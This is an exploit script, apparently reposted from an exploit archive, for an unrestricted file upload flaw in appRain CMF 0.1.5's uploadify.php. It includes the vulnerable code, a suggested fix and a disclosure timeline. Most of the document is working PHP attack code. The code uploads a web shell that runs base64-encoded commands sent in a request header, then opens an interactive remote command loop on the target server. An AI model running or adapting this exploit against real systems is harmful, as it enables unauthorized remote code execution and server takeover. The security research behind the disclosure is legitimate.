[webapps / 0day] – appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
<?php
/*
———————————————————————
appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
———————————————————————
author…………: Egidio Romano aka EgiX
mail…………..: n0b0d13s[at]gmail[dot]com
software link…..: http://www.apprain.com/
+————————————————————————-+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+————————————————————————-+
[-] vulnerable code in /webroot/addons/uploadify/uploadify.php
27. if (!empty($_FILES)) {
28. $tempFile = $_FILES['Filedata']['tmp_name'];
29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . ‘/’;
30. $targetFile = "uploads/" . $_FILES['Filedata']['name'];
31.
32. // $fileTypes = str_replace(‘*.’,”,$_REQUEST['fileext']);
33. // $fileTypes = str_replace(‘;’,'|’,$fileTypes);
34. // $typesArray = split(‘|’,$fileTypes);
35. // $fileParts = pathinfo($_FILES['Filedata']['name']);
36.
37. // if (in_array($fileParts['extension'],$typesArray)) {
38. // Uncomment the following line if you want to make the directory if it doesn’t exist
39. // mkdir(str_replace(‘//’,'/’,$targetPath), 0755, true);
40.
41. move_uploaded_file($tempFile,$targetFile);
42. echo str_replace($_SERVER['DOCUMENT_ROOT'],”,$targetFile);
43. // } else {
44. // echo ‘Invalid file type.’;
45. // }
46. }
Restricted access to this script isn’t properly realized, so an attacker might be able to upload
arbitrary files containing malicious PHP code due to uploaded file extension isn’t properly checked.
[-] Possible bug fix:
include_once(‘../../../app.php’);
App::__Obj(‘appRain_Base_Core’)->check_admin_login();
add this lines of code at the beginning of the script
[-] Disclosure timeline:
[19/12/2011] – Vulnerability discovered
[19/12/2011] – Issue reported to http://www.apprain.com/ticket/1135
[20/12/2011] – Vendor response and fix suggested
[16/01/2012] – After four weeks still no fix released
[19/01/2012] – Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("n[-] No response from {$host}:80n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "n+—————————————————————+";
print "n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
print "n+—————————————————————+n";
if ($argc < 3)
{
print "nUsage……: php $argv[0] <host> <path>n";
print "nExample….: php $argv[0] localhost /";
print "nExample….: php $argv[0] localhost /apprain-v015/n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "–o0oOo0orn";
$payload .= "Content-Disposition: form-data; name="Filedata"; filename="sh.php"rnrn";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD]));rn";
$payload .= "–o0oOo0o–rn";
$packet = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";
$packet .= "Connection: closernrn{$payload}";
if (!preg_match(‘/sh.php/’, http_send($host, $packet))) die("n[-] Upload failed!n");
$packet = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cmd: %srn";
$packet .= "Connection: closernrn";
while(1)
{
print "napprain-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match(‘/___(.*)/s’, $response, $m) ? print $m[1] : die("n[-] Exploit failed!n");
}
?>
# [1337day.com][1] [2012-01-19]
[1]: http://www.1337day.com/
Leave a Reply